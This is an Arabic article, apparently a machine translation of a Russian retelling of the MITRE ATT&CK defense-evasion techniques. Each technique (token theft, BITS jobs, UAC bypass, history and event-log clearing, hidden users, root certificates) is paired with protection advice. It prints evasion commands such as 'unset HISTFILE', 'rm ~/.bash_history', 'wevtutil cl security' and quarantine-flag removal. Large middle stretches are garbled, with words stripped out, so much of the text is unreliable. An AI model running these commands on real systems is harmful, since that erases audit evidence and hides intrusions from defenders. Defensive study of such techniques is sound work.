روابط لجميع الأجزاء:الجزء 1. الحصول على الوصول الأولي (الوصول الأولي)الجزء 2. التنفيذالجزء 3. الربط (الثبات)الجزء 4. امتياز التصعيدالجزء 5. الدفاع التهربالجزء 6. الحصول على بيانات الاعتماد (الوصول إلى بيانات الاعتماد)الجزء 7. الاكتشافالجزء 8. الحركة الجانبيةالجزء 9. جمع البيانات (جمع)الجزء 10الجزء 11. القيادة والسيطرةيصف قسم "تجاوز الحماية" التقنيات التي يمكن من خلالها للمهاجم إخفاء النشاط الضار ومنع اكتشافه بواسطة أدوات الحماية. يتم تضمين أشكال مختلفة من التقنيات من أقسام أخرى من سلسلة الهجوم التي تساعد على التغلب على الدفاعات المحددة والتدابير الوقائية التي اتخذها الجانب المدافع في تقنيات تجاوز الدفاع. في المقابل ، يتم تطبيق تقنيات تجاوز الدفاع في جميع مراحل الهجوم.
المؤلف غير مسؤول عن العواقب المحتملة لتطبيق المعلومات الواردة في المقالة ، كما يعتذر عن عدم الدقة المحتملة في بعض الصياغات والمصطلحات. المعلومات المنشورة هي إعادة سرد مجانية لمحتويات MITER ATT & CK .النظام: ويندوز
الحقوق: المستخدم ، المسؤول
الوصف: يمكن للمهاجمين استخدام رموز الوصول لأداء إجراءات في سياقات أمان المستخدم أو النظام المختلفة ، وبالتالي تجنب اكتشاف النشاط الضار. يمكن للخصم استخدام وظائف Windows API لنسخ رموز الوصول من العمليات الحالية (سرقة الرمز المميز) ، لذلك يجب أن يكون في سياق مستخدم متميز (على سبيل المثال ، مسؤول). يستخدم سرقة رموز الوصول بشكل شائع لرفع الامتيازات من مستوى المسؤول إلى مستوى النظام. يمكن للخصم أيضًا استخدام الرمز المميز للوصول إلى الحساب للمصادقة على نظام بعيد ، إذا كان هذا الحساب لديه الأذونات اللازمة على النظام البعيد. هناك ثلاث طرق رئيسية لإساءة استخدام الرموز المميزة للوصول.
سرقة وانتحال الرموز.يمثل انتحال الرموز المميزة قدرة نظام التشغيل على بدء مؤشرات الترابط في سياق أمان بخلاف سياق العملية التي ينتمي إليها هذا الخيط. بمعنى آخر ، يتيح لك تجسيد الرموز تنفيذ أي إجراءات نيابة عن مستخدم آخر. يمكن للخصم تكرار رمز وصول باستخدام دالة
DuplicateTokenEX واستخدام
ImpersonateLoggedOnUser للاتصال
بسلسلة رسائل في سياق مستخدم مُسجّل الدخول ، أو استخدام
SetThreadToken لتعيين رمز مميز للوصول إلى دفق.
إنشاء عملية باستخدام رمز وصول.يمكن للمهاجم إنشاء رمز وصول باستخدام دالة
DuplicateTokenEX ثم استخدامه مع
CreateProcessWithTokenW لإنشاء عملية جديدة يتم تشغيلها في سياق المستخدم الممثل.
الحصول على وانتحال شخصية الرموز المميزةيمكن للخصم ، الذي له اسم مستخدم وكلمة مرور ، إنشاء جلسة تسجيل دخول باستخدام وظيفة API
LogonUser ، والتي ستُرجع نسخة من رمز وصول الجلسة لجلسة جديدة ، وبعد ذلك ، باستخدام
وظيفة SetThreadToken ، قم بتعيين الرمز المميز المستلم للدفق.
لدى Metasploit Meterpreter و
CobaltStrike أدوات لمعالجة الرموز المميزة للوصول إلى الامتيازات.
توصيات الحماية: من أجل الاستفادة الكاملة من التكتيكات المذكورة أعلاه ، يجب أن يتمتع المهاجم بحقوق مسؤول النظام ، لذلك لا تنس أن تحد من امتيازات المستخدمين العاديين. يمكن لأي مستخدم خداع رموز الوصول إذا كان لديهم بيانات اعتماد شرعية. الحد من قدرة المستخدمين والمجموعات على إنشاء رموز وصول:
GPO: تكوين الكمبيوتر> [السياسات]> إعدادات Windows> إعدادات الأمان> السياسات المحلية> تعيين حقوق المستخدم: إنشاء كائن رمزي .
حدد أيضًا من يمكنه استبدال الرموز المميزة للعملية الخاصة بالخدمات المحلية أو خدمات الشبكة:
GPO: تكوين الكمبيوتر> [السياسات]> إعدادات Windows> إعدادات الأمان> السياسات المحلية> تعيين حقوق المستخدم: استبدال رمز مميز على مستوى العملية.النظام: ويندوز
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: تعتبر خدمة النقل الذكي في الخلفية في Windows (BITS) آلية لنقل الملفات بشكل غير متزامن من خلال طراز كائن المكون (COM) باستخدام نطاق ترددي منخفض. عادةً ما يتم استخدام BITS من قِبل المُحدثين والرسائل الفورية والتطبيقات الأخرى التي تفضل العمل في الخلفية دون مقاطعة تشغيل تطبيقات الشبكة الأخرى. يتم تمثيل مهام نقل الملفات كمهام BITS التي تحتوي على قائمة انتظار واحدة أو أكثر من عمليات الملفات. تتوفر واجهة إنشاء مهام BITS وإدارتها في أداة PowerShell و BITSAdmin. يمكن للمهاجمين استخدام BITS لتنزيل وبدء ثم تنظيف بعد تنفيذ تعليمات برمجية ضارة. يتم تخزين مهام BITS بشكل مستقل في قاعدة بيانات BITS ، في حين لا يقوم النظام بإنشاء ملفات جديدة أو إدخالات التسجيل ، وغالبًا ما يسمح BITS بواسطة جدار الحماية. باستخدام مهام BITS ، يمكنك الحصول على موطئ قدم في النظام عن طريق إنشاء مهام طويلة (افتراضيًا لمدة 90 يومًا) أو عن طريق استدعاء برنامج تعسفي بعد الانتهاء من مهمة أو خطأ BITS (بما في ذلك بعد إعادة تشغيل نظام التشغيل).
توصيات الحماية: BITS هي وظيفة نظام تشغيل قياسية ، يصعب التمييز بين استخدامها والنشاط الضار ، لذلك يجب أن يكون متجه الحماية موجهاً لمنع إطلاق الأدوات الضارة في بداية سلسلة الهجوم. يمكن أن يؤدي تعطيل BITS تمامًا إلى إيقاف تحديثات البرامج المشروعة ، ومع ذلك ، يمكنك التفكير في تقييد الوصول إلى واجهة BITS لمستخدمين محددين ومجموعات وصول ، ويمكنك أيضًا تقييد عمر مهام BITS ، والذي يتم تعيينه عن طريق تغيير المفاتيح التالية:
- HKEY_LOCAL_MACHINE \ البرامج \ السياسات \ Microsoft \ Windows \ BITS \ JobInactivityTimeout؛
- HKEY_LOCAL_MACHINE \ البرامج \ السياسات \ Microsoft \ Windows \ BITS \ MaxDownloadTime .
النظام: ويندوز ، لينكس ، ماك
الوصف: بعض ميزات الأمان تفحص الملفات من خلال البحث عن التواقيع الثابتة. يمكن للمعارضين إضافة بيانات إلى الملفات الضارة من أجل زيادة حجمها إلى قيمة تتجاوز الحد الأقصى المسموح به للحجم الممسوح ضوئيًا للملف أو تغيير تجزئة الملف لتجاوز القائمة السوداء لحظر تشغيل الملفات بالتجزئة.
توصيات الحماية: قم بتوفير التعرف على البرامج التي يحتمل أن تكون خطرة من خلال تطبيق أدوات مثل
AppLocker ، أدوات القائمة البيضاء وسياسات تقييد البرامج.
النظام: ويندوز
الحقوق: المستخدم ، المسؤول
الوصف: هناك العديد من الطرق لتجاوز UAC ، الأكثر شيوعًا يتم تنفيذها في مشروع
UACMe . يتم اكتشاف طرق جديدة لتجاوز UAC بانتظام ، مثل إساءة استخدام
eventvwr.exe في تطبيق النظام ، والذي يمكنه تنفيذ ملف ثنائي أو برنامج نصي مرتفع. يمكن أيضًا تضمين البرامج الضارة في عمليات موثوق بها تتيح UAC من خلالها تصعيد الامتيازات دون مطالبة المستخدم.
لتجاوز UAC باستخدام eventvwr.exe ، يتم تعديل المفتاح في تسجيل Windows:
[HKEY_CURRENT_USER] \ Software \ Classes \ mscfile \ shell \ open \ command .
لتجاوز UAC باستخدام sdclt.exe ، يتم تعديل المفاتيح في تسجيل Windows:
[HKEY_CURRENT_USER] \ البرامج \ Microsoft \ Windows \ CurrentVersion \ App Paths \ control.exe؛
[HKEY_CURRENT_USER] \ البرامج \ الفصول \ exefile \ shell \ runas \ command \ insulationCommand.توصيات الحماية: قم بإزالة المستخدمين من مجموعة المسؤولين المحليين على الأنظمة المحمية. إذا كان ذلك ممكنًا ، فقم بتمكين أعلى مستوى من الحماية في إعدادات UAC.
النظام: ويندوز
الحقوق: المستخدم
الوصف: مثبّت ملفات تعريف اتصال اتصال Microsoft (cmstp.exe) هو الأداة المساعدة "مثبّت اتصال إدارة التثبيت" المضمنة في Windows. يمكن أن يأخذ Cmstp.exe ملف inf كمعلمة ، لذلك يمكن للمهاجم إعداد ملف INF ضار خاص لتنزيل وتنفيذ DLLs أو البرامج النصية (* .sct) من الخوادم البعيدة تجاوز AppLocker والأقفال الأخرى ، لأن cmstp.exe موقعة بشهادة Microsoft الرقمية.
توصيات الحماية: منع إطلاق تطبيقات يحتمل أن تكون خطرة. رصد أو حظر تماما
تطلق C: \ ويندوز \ SYSTEM32 \ cmstp.exe .
النظام: لينكس ، ماك
الحقوق: المستخدم
الوصف: لراحة المستخدمين على أنظمة macOS و Linux ، يتم تسجيل جميع الأوامر التي ينفذها المستخدم في الجهاز. يمكن للمستخدمين تنفيذ أمر قاموا به من قبل في جلسة أخرى بسرعة. عندما يقوم المستخدم بتسجيل الدخول إلى النظام ، يتم حفظ محفوظات الأمر في الملف المحدد في متغير HISTFILE. عند تسجيل خروج المستخدم ، يتم حفظ محفوظات الأمر في الدليل الرئيسي للمستخدم ~ / .bash_history. قد يحتوي ملف محفوظات الأوامر أيضًا على كلمات مرور أدخلها المستخدم بنص واضح. يمكن للمهاجمين البحث عن كلمات المرور في ملفات محفوظات الأوامر واتخاذ تدابير لمنع كتابة نشاطهم الضار في سجل الأوامر ، على سبيل المثال:
unset HISTFILE؛
تصدير HISTFILESIZE = 0 ؛
التاريخ ج.
rm ~ / .bash_history.توصيات الحماية: يمكن أن يؤدي منع المستخدمين من حذف أو كتابة ملفات bash_history إلى منع الخصم من إساءة استخدام هذه الملفات ؛ بالإضافة إلى ذلك ، سيؤدي تقييد حقوق المستخدم لتحرير متغيرات HISTFILE و HISTFILESIZE إلى الاحتفاظ بسجل تنفيذ الأمر.
النظام: ويندوز ، ماك
الوصف: التوقيع الرقمي للرمز يوفر مصادقة المطور وضمان عدم تعديل الملف. ومع ذلك ، كما تعلمون ، يمكن للمعارضين استخدام التواقيع لإخفاء البرامج الضارة كملفات ثنائية مشروعة. يمكن إنشاء شهادات توقيع رقمي أو العبث بها أو سرقتها بواسطة مهاجم. يتم استخدام رمز التوقيع للتحقق من البرنامج في البداية في Windows و macOS و OS X ولا يستخدم في Linux بسبب الهيكل اللامركزي للنظام الأساسي. يمكن استخدام شهادات توقيع الكود لتجاوز سياسات الأمان التي تتطلب تنفيذ التعليمات البرمجية الموقعة فقط على النظام.
توصيات الحماية: يمكن أن يؤدي استخدام "القوائم البيضاء" للبرنامج واختيار ناشري البرامج الموثوقين قبل التحقق من التوقيع الرقمي إلى منع تنفيذ التعليمات البرمجية الضارة أو غير الموثوق بها في النظام المحمي.
النظام: ويندوز
الحقوق: النظام
الوصف: يمكن أن يستخدم بعض مجرمي الإنترنت أدوات متطورة لتسوية مكونات الكمبيوتر وتثبيت البرامج الثابتة الضارة عليها والتي ستقوم بتشغيل تعليمات برمجية ضارة خارج نظام التشغيل أو حتى البرامج الثابتة للنظام الرئيسية (Bios). تتكون هذه التقنية من مكونات الكمبيوتر الوامضة التي لا تحتوي على نظام فحص سلامة مدمج ، على سبيل المثال ، محركات الأقراص الثابتة. يمكن للجهاز الذي يحتوي على برامج ثابتة ضارة أن يوفر وصولًا مستمرًا إلى النظام الذي تمت مهاجمته على الرغم من حالات فشل القرص الصلب والكتابة فوقه. تم تصميم هذه التقنية للتغلب على حماية البرمجيات ومراقبة النزاهة.
النظام: ويندوز
الحقوق: المستخدم
الوصف: Microsoft Component Object Model (COM) هي تقنية لإنشاء برامج تستند إلى مكونات متفاعلة لكائن ، يمكن استخدام كل منها في العديد من البرامج في وقت واحد. يمكن للمهاجمين استخدام COM لحقن تعليمات برمجية ضارة يمكن تنفيذها بدلاً من واحدة شرعية عن طريق التقاط روابط وروابط COM. لاعتراض كائن COM ، تحتاج إلى استبدال الارتباط بمكون نظام شرعي في سجل Windows. ستقوم مكالمة أخرى بهذا المكون بتنفيذ تعليمات برمجية ضارة.
توصيات الحماية: لا يوصى باتخاذ تدابير وقائية لمنع هذا الهجوم ، لأن كائنات COM جزء من نظام التشغيل وتثبيتها في برنامج النظام. يمكن أن يؤثر حظر التغييرات على كائنات COM على استقرار نظام التشغيل والبرامج. ينصح ناقل الحماية بحظر البرامج الضارة والخطيرة.
النظام: ويندوز
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: يتمثل التكتيك في استخدام عناصر لوحة تحكم Windows بواسطة المهاجمين لتنفيذ الأوامر التعسفية كحمولة (على سبيل المثال ، فيروس
Reaver ). يمكن إخفاء الكائنات الضارة كعناصر تحكم قياسية وتسليمها إلى النظام باستخدام مرفقات تصيّد. الأدوات المساعدة لعرض إعدادات Windows وتكوينها هي ملفات exe وملفات CPL لعناصر لوحة تحكم Windows المسجلة. تتم إعادة تسمية ملفات CPL بالفعل DLLs التي يمكن تشغيلها بالطرق التالية:
- مباشرة من سطر الأوامر: control.exe <file.cpl> ؛
- باستخدام وظائف API من shell32.dll: rundll32.exe shell32.dll ، Control_RunDLL <file.cpl> ؛
- انقر مرتين على ملف cpl.
يتم عرض CPLs المسجلة المخزنة في System32 تلقائيًا في لوحة تحكم Windows ولديك معرف فريد مخزّن في التسجيل:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ ControlPanel \ NameSpaceيتم تخزين معلومات حول قوائم CPL الأخرى ، على سبيل المثال ، اسم العرض ومسار ملف cpl ، في
أقسام Cpls و
Extended Properties في القسم:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Control Panelيتم تسجيل بعض CPLs التي تم إطلاقها من خلال shell في القسم:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Controls Folder \ {name} \ shellex \ PropertySheetHandlersتوصية الحماية: تقييد تشغيل ملفات عناصر لوحة التحكم وتخزينها فقط في المجلدات المحمية (على سبيل المثال ،
C: \ Windows \ System32 ) ، وتمكين User Account Control (UAC) و AppLocker لمنع التغييرات غير المصرح بها على النظام. بالطبع ، استخدام برنامج مكافحة الفيروسات.
النظام: ويندوز
الحقوق: المسؤول
الوصف: يتضمن
DCShadow إنشاء وحدة تحكم مجال مزيفة في الشبكة التي تمت مهاجمتها بمساعدة ذلك ، باستخدام وظيفة API للتفاعل مع القرص المضغوط الذي تمت مهاجمته ، يمكن للمهاجم تعديل بيانات AD ، بما في ذلك التغييرات على أي كائن مجال وبيانات الاعتماد والمفاتيح ، دون أن تلاحظها أنظمة SIEM. مجموعة الأدوات لتنفيذ الهجوم جزء من mimikatz. يمكن استخدام DCShadow لتنفيذ هجوم حقن SID-History ولإنشاء مناطق خلفية لمزيد من الدمج في النظام.
توصيات الحماية: نظرًا لأن تقنية DCShadow تعتمد على إساءة استخدام ميزات تصميم AD ، يجب توجيه ناقل الحماية لمنع إطلاق أدوات الهجوم. يمكن اكتشاف أي هجوم عن طريق تحليل النسخ المتماثل للشبكة من النسخ المتماثل للقرص المضغوط ، والذي يتم تشغيله كل 15 دقيقة ، ولكن يمكن أن يحدث بسبب مهاجم خارج الجدول.
النظام: ويندوز
الحقوق: المستخدم ، المسؤول ، النظام
الوصف: تتكون
هذه التقنية من استغلال الثغرات الموجودة في الخوارزمية للعثور على ملفات DLL التي يحتاجون إليها للعمل (
MSA2269637 ) من خلال
التطبيقات . غالبًا ما يكون دليل بحث DLL هو دليل العمل الخاص بالبرنامج ، بحيث يمكن للمهاجمين استبدال DLL المصدر باسم خبيث يحمل نفس اسم الملف.
يمكن تنفيذ الهجمات عن بعد على عمليات بحث DLL عندما يقوم البرنامج بتثبيت الدليل الحالي في دليل بعيد ، على سبيل المثال ، مشاركة شبكة. أيضًا ، يمكن للمهاجمين تغيير طريقة البحث عن DLLs وتحميلها مباشرةً عن طريق استبدال ملفات .manifest أو .local التي تصف معلمات بحث DLL. إذا كان البرنامج الذي تمت مهاجمته يعمل بمستوى عالٍ من الامتيازات ، فسيتم أيضًا تنفيذ DLL الضار الذي تم تحميله به بحقوق عالية. في هذه الحالة ، يمكن استخدام هذه التقنية لزيادة الامتيازات من المستخدم إلى المسؤول أو النظام.
توصيات الحماية: منع تحميل DLL عن بُعد (يتم تمكينه افتراضيًا في Windows Server 2012+ ومتاح مع تحديثات XP + و Server 2003+). تمكين وضع البحث الآمن لـ DLL ، والذي يقيد أدلة البحث إلى الدلائل مثل
٪ SYSTEMROOT٪ قبل إجراء بحث DLL في دليل التطبيق الحالي.
تمكين وضع بحث DLL الآمن:
تكوين الكمبيوتر> [سياسات]> قوالب الإدارة> MSS (وراثي): MSS: (SafeDllSearchMode) تمكين وضع بحث DLL الآمن.مفتاح التسجيل المقابل:
HKLM \ SYSTEM \ CurrentControlSet \ التحكم \ مدير الجلسة \ SafeDLLSearchMode.ضع في اعتبارك مراجعة نظام محمي لإصلاح أوجه القصور في DLL باستخدام أدوات مثل PowerUP في PowerSploit. لا تنسى حظر البرامج الضارة والخطيرة ، وكذلك اتباع
توصيات Microsoft .
النظام: ويندوز
الوصف: يعتمد الهجوم على ثغرات تقنية التنفيذ المتوازي جنبًا إلى جنب (WinSxS أو SxS) ، والتي يتمثل جوهرها في تمكين التطبيقات التي تستخدم إصدارات غير متوافقة من نفس مكونات الكود. يوجد مستودع تجميع المكونات في المجلد c: \ windows \ winsxs. يجب أن يكون لكل تجميع بيان مرتبط به - ملف xml يحتوي على معلومات حول الملفات والفئات والواجهات والمكتبات وعناصر التجميع الأخرى. على غرار تقنيات اختطاف بحث DLL ، يمكن للخصوم استفزاز تطبيق مستخدم لتحميل DLL ضار "بشكل جانبي" ، المسار الذي تم تحديده في ملف بيان التجميع.
٪ TEMP٪ \ RarSFX٪ \٪ ALLUSERS PROFILE٪ \ SXS؛
٪ TEMP٪ \ RarSFX٪ \٪ ALLUSERS PROFILE٪ \ WinSxS.توصيات الحماية: تحديثات البرامج العادية ، وتثبيت التطبيقات في الدلائل التي هي محمية ضد الكتابة. استخدام ملف sxstrace.exe للتحقق من ملفات البيان للتعرف على ثغرات التحميل المتأخرة.
النظام: ويندوز
الحقوق: المستخدم
الوصف: يمكن للمهاجمين استخدام تشويش الملفات والمعلومات لإخفاء الأكواد الخبيثة والقطع الأثرية المتبقية من الغزو. / . , , , certutil , . — cop /b (Payload).
Payload- , . , (User execution). .
: - , AppLocker .
: Windows, Linux, macOS
: , , , , .
: , , .
النظام: Windows ، Linux ،حقوق macOS :وصف المستخدم : كما هو الحال مع أي برنامج ، قد يكون لبرامج الأمن نقاط ضعف يمكن أن يستخدمها مهاجم لتعطيلها أو تجاوزها.توصيات الحماية: تحديثات منتظمة للبرامج ، وتطوير وتنفيذ عملية لإدارة ثغرة البرامج. يمكن أن يؤدي استخدام تطبيقات المحاكاة الافتراضية والتقطيع الصغير إلى تقليل مخاطر الاستغلال المحتمل للثغرات الأمنية.النظام: حقوق Windows : المسؤول ،وصف النظام : تتمثل الطريقة في إساءة استخدام الذاكرة الإضافية لإطار Windows ، ما يسمى "ذاكرة النافذة الإضافية" (EWM). يبلغ حجم EWM 40 بايتًا ، وهو مناسب لتخزين مؤشر 32 بت ، ويستخدم غالبًا للإشارة إلى الإجراءات. يمكن أن تضع البرامج الضارة خلال سلسلة الهجوم مؤشرًا على التعليمات البرمجية الضارة في EWM ، والتي سيتم إطلاقها لاحقًا بواسطة عملية التطبيق المصابة.توصيات الحماية:نظرًا لأن تقنيات حقن EWM تستند إلى إساءة استخدام وظائف تطوير نظام التشغيل ، يجب توجيه جهود الحماية إلى منع بدء تشغيل البرامج الضارة والأدوات الضارة. من الممارسات الجيدة تحديد البرامج التي يحتمل أن تكون خطرة وحظرها باستخدام AppLocker أو تطبيقات القائمة البيضاء أو تطبيق سياسات تقييد البرامج.: Windows, Linux, macOS
:: , , . - , . (, Windows Sysinternals Sdelete), , , DEL ipher.
: , , - , .
: Windows
:: Windows . , . . NinjaCopy PowerShell.
: - .
: macOS
: ,
: macOS OS X Gatekeper, . com.apple.quarantine , , Gatekeeper . , Gatekeeper , URL, . , USB-, , com.apple.quarantine. , ( Drive-by-compromise), Gatekeeper, . :
xattr /path/to/MyApp.app .
attr, :
sudo xattr -r -d com.apple.quarantine /path/to/MyApp.app: Gatekeeper AppleStore.
: Linux, macOS
:: HISTCONTROL ~/.bash_history . , ignorespace , , ignoredups . Linux ignoreboth, . , " ls" «ls ».
لا يتم استخدام HISTCONTROL بشكل افتراضي على نظام التشغيل macOS ، ولكن يمكن تهيئته بواسطة المستخدم. يمكن للمهاجمين استخدام ميزات معلمات HISTCONTROL لعدم ترك آثار نشاطهم ببساطة عن طريق إدخال مسافات أمام الأوامر.توصيات الحماية: منع المستخدمين من تغيير المتغير HISTCONTROL ، وتأكد أيضًا من تعيين HISTCONTROL على التجاهل وعدم احتوائه على خيارات التجاهل وتجاهل المساحة.النظام: Windows ، Linux ،حقوق macOS :وصف المستخدم : على Windows ، يمكن للمستخدمين إخفاء الملفات باستخدام الأمر attrib. يكفي تحديد السمة + h <اسم الملف> لإخفاء الملف أو "+ s" لتمييز الملف كنظام. بإضافة المعلمة "/ S" ، ستقوم الأداة المساعدة attrib بتطبيق التغييرات بشكل متكرر. على Linux / Mac ، يمكن للمستخدمين إخفاء الملفات والمجلدات ببساطة عن طريق تحديد "." في بداية اسم الملف. بعد ذلك ، سيتم إخفاء الملفات والمجلدات من تطبيق Finder ومثل الأداة المساعدة ls.macOS UF_HIDDEN, Finder.app, Terminal.app. , . , SSH .ssh, .
, .
: — .
: macOS
: , root
: macOS userID, .
/Library/Preferences/com.apple.loginwindow Hide500Users , 500 . , <500 Hide500Users :
sudo dscl. -create /User/username UniqueID 401
sudo defaults write /Library/Preferences/com.apple.loginwindow Hide500Users -bool TRUE: , . , /Library/Preferences/com.apple.loginwindow.
: macOS
:: macOS OS X plist- . apple.awt.UIElement Java- Dock. , , .
: , plist- apple.awt.UIElement.
النظام: حقوق Windows : المسؤول ،وصف النظام : تتيح لك آلية خيارات تنفيذ ملف الصورة (IFEO) تشغيل مصحح أخطاء البرنامج بدلاً من البرنامج ، المحدد مسبقًا بواسطة المطور في السجل:- HKLM \ البرامج \ Microsoft \ Windows NT \ CurrentVersion \ خيارات تنفيذ ملف الصورة / [قابل للتنفيذ]
- HKLM \ SOFTWARE \ Wow6432Node \ Microsoft \ Windows NT \ CurrentVersion \ Image Execution Options \ [قابل للتنفيذ] ، حيث [القابل للتنفيذ] هو ثنائي قابل للتنفيذ من مصحح الأخطاء.
,
[executable] , . IFEO , , .
: , - , , . IFEO- .
Debug_process Debug_only_this_process .: Windows
: , . , .
, . , , , , , .
: , , . , .
: Windows, Linux, macOS
: , (), , , , . . , - / , , .
:قد يكون للخصم حق الوصول إلى النظام ومعرفة الطرق والأدوات التي يتم حظرها بواسطة حماية المقيمين. استخدم الطرق المتقدمة لإعداد ميزات الأمان والسلامة ، واستكشف عملية التسوية المحتملة للنظام المحمي من أجل تنظيم عملية التحذير من أي اقتحام محتمل.حدد وحظر البرامج التي يحتمل أن تكون خطرة وخبيثة باستخدام أدوات القائمة البيضاء مثل AppLocker وسياسات تقييد البرامج.. IDS-, .. , «» . , , , .
: Windows, Linux, macOS
: , , , . , Windows Event Linux/macOS, /.bash_history .var/log/*.
, , , , . - .
Windows Event LogsWindows Event Logs — . Microsoft « , ». : , .
, , , , .. , .
:
wevtutil cl system;
wevtutil cl application;
wevtutil cl security., PowerShell.
: , . , . , , , . . 1102: « ».
: Windows
:: Windows, cmd. , Forfiles, (pcalua.exe), Windows Linux (WSL), , «» .
, , , , CMD.
:حدد وحظر البرامج التي يحتمل أن تكون خطرة أو ضارة باستخدام سياسات تقييد البرامج وتقييد البرامج. يمكن استخدام هذه الآليات لتعطيل أو تقييد وصول المستخدم إلى الأدوات المساعدة التي يمكن استخدامها لتنفيذ الأوامر بشكل غير مباشر.النظام: ويندوز ، لينكس ، ماك
الحقوق: المسؤول ، المستخدم
الوصف: يتم استخدام شهادات الجذر لتحديد مرجع مصدق (CA). عند تثبيت شهادة الجذر ، يثق النظام والتطبيقات في جميع الشهادات في سلسلة شهادات الجذر. تستخدم الشهادات عادة لتأسيس اتصالات TLS / SSL آمنة في متصفح الويب. إذا حاول أحد المستخدمين فتح موقع تقدم عليه شهادة غير موثوق بها ، فستظهر رسالة خطأ تحذر المستخدم من مخاطر الأمان. بناءً على إعدادات الأمان ، قد يمنع المتصفح الاتصالات بالمواقع غير الموثوق بها.
يسمح تثبيت شهادة الجذر في نظام مهاجم للمهاجمين بتخفيض المستوى الإجمالي لأمان النظام. يمكن للمهاجمين استخدام هذه الطريقة لإخفاء تحذيرات الأمان ، ونتيجة لذلك سيقوم المستخدم بالاتصال عبر HTTPS بخوادم الويب التي يسيطر عليها العدو من أجل سرقة بيانات اعتماده.
يمكن أيضًا تثبيت شهادات الجذر الدخيلة مسبقًا من قِبل الشركة المصنعة للبرامج إما أثناء سلسلة توريد البرامج واستخدامها جنبًا إلى جنب مع البرامج الضارة والبرامج الإعلانية ، أو لتوفير هجوم "الشخص المتوسط" لاعتراض المعلومات المرسلة عبر اتصالات TLS / SSL الآمنة.
يمكن أيضًا استنساخ شهادات الجذر وإعادة تثبيتها. يمكن استخدام سلاسل الشهادات هذه لتوقيع تعليمات برمجية ضارة لتجاوز أدوات التحقق من التوقيع المستخدمة لحظر عمليات الاقتحام والكشف عنها.
على نظام macOS ، تستخدم البرمجيات الخبيثة Ay MaMi الأمر
/ user / bin / security-trust-cert-d-add-r-trust -oot -k / Library / Keychains / System / path keychain / to / malicious / cert لتعيين الشهادة على أنها شهادة جذر موثوق بها في سلسلة النظام.
توصيات الأمان: يعد HTTP Public Key Pinning (HPKP) إحدى طرق الحماية من هجمات سلسلة الشهادات. يفترض HPKP أن الخادم يخبر العميل بمجموعة من تجزئة المفتاح العمومي ، والتي يجب أن تكون الوحيدة الموثوق بها عند الاتصال بهذا الخادم لفترة زمنية محددة.
يمكن استخدام Windows Group Policy لإدارة شهادات الجذر ومنع غير المسؤولين من تثبيت شهادات الجذر الإضافية في مستودعات المستخدم (HKCUs):
HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ SystemCertificates \ Root \ ProtectedRoots \ Flags = 1.من غير المرجح أن تتغير شهادات الجذر للنظام في كثير من الأحيان ، لذلك ، أثناء مراقبة الشهادات الجديدة ، يمكن للمرء اكتشاف النشاط الضار أو التأكد من عدم وجود شهادات غير ضرورية أو مشبوهة. توفر Microsoft قائمة شهادات الجذر الموثوق بها من خلال authroot.stl. يمكن استخدام الأداة المساعدة Sysinternals Sigcheck لتفريغ محتويات مخزن الشهادات (Sigcheck [64] .exe -tuv) وتحديد الشهادات غير المضمنة في Microsoft Trust Trust List.
توجد شهادات الجذر المثبتة في السجل في الأقسام التالية:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ EnterpriseCertificates \ Root \ Certificates
HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \ SOFTWARE [\ Policies] \ Microsoft \ SystemCertificates \ Root \ Certificatesهناك مجموعة فرعية من شهادات الجذر التي يتم استخدامها باستمرار في أنظمة Windows التي يمكن استخدامها للمراقبة:
• 18F7C1FCC3090203FD5BAA2F861A754976C8DD25 ؛
• 245C97DF7514E7CF2DF8BE72AE957B9E04741E85 ؛
• 3B1EFD3A66EA28B16697394703A72CA340A05BD5 ؛
• 7F88CD7223F3C813818C994614A89C99FA3B5247 ؛
• 8F43288AD272F3103B6FB1428485EA3014C0BCFE ؛
• A43489159A520F0D93D032CCAF37E7FE20A8B419 ؛
• BE36A4562FB2EE05DBB3D32323ADF445084ED656 ؛
• CDD4EEAE6000AC7F40C3802C171E30148030C072.
النظام: ويندوز
الحقوق: المستخدم
الوصف: InstallUtil هي أداة مساعدة لسطر أوامر Windows يمكنها تثبيت وإلغاء تثبيت التطبيقات التي تتوافق مع مواصفات .NET Framework. يتم تثبيت Installutil تلقائيًا باستخدام VisualStudio. يتم توقيع ملف InstallUtil.exe بواسطة شهادة Microsoft ويتم تخزينه في:
C: \ Windows \ Microsoft.NET \ Framework \ v [الإصدار] \ InstallUtil.exeيمكن للمهاجمين استخدام وظيفة InstallUtil لتنفيذ تعليمات بروكسي الوكيل وتجاوز قوائم بيضاء للتطبيق.
توصيات الحماية: من الممكن ألا يتم استخدام InstallUtil على نظامك ، لذلك ضع في اعتبارك حظر تثبيت InstallUtil.exe.
النظام: ماك
الحقوق: المستخدم ، المسؤول
الوصف: بدءًا من OS X 10.8 ، يتم تضمين رأس LC_MAIN في الملفات التنفيذية mach-O ، مما يشير إلى نقطة إدخال الشفرة الثنائية لتنفيذه. في الإصدارات السابقة ، تم استخدام رأسي LC_THREAD و LC_UNIXTHREAD. يمكن تعديل نقطة الدخول للثنائي وسيتم تنفيذ الإضافة الخبيثة في البداية ، ومن ثم سيعود التنفيذ إلى نقطة البداية حتى لا يلاحظ الضحية أي شيء. يعد هذا التعديل للملفات الثنائية طريقة لتجاوز قائمة التطبيقات البيضاء ، لأن اسم الملف ومسار التطبيق سيظلان دون تغيير.
توصيات الحماية: استخدم التطبيقات التي تحتوي على توقيعات رقمية صالحة فقط من المطورين الموثوق بهم. سيؤدي تعديل رأس LC_MAIN إلى إبطال توقيع الملف وتغيير المجموع الاختباري للملف.
النظام: ماك
الحقوق: المستخدم ، المسؤول
الوصف: Launchctl - أداة مساعدة لإدارة خدمة Launchd. باستخدام Launchctl ، يمكنك إدارة خدمات النظام والمستخدم (LaunchDeamons و LaunchAgents) ، وكذلك تنفيذ الأوامر والبرامج. يدعم Launchctl الأوامر الفرعية لسطر الأوامر ، التفاعلية أو المعاد توجيهها من الإدخال القياسي:
launchctl submit -l [labelname] - / Path / to / thing / to / execute '' arg "'' arg" '' arg " .
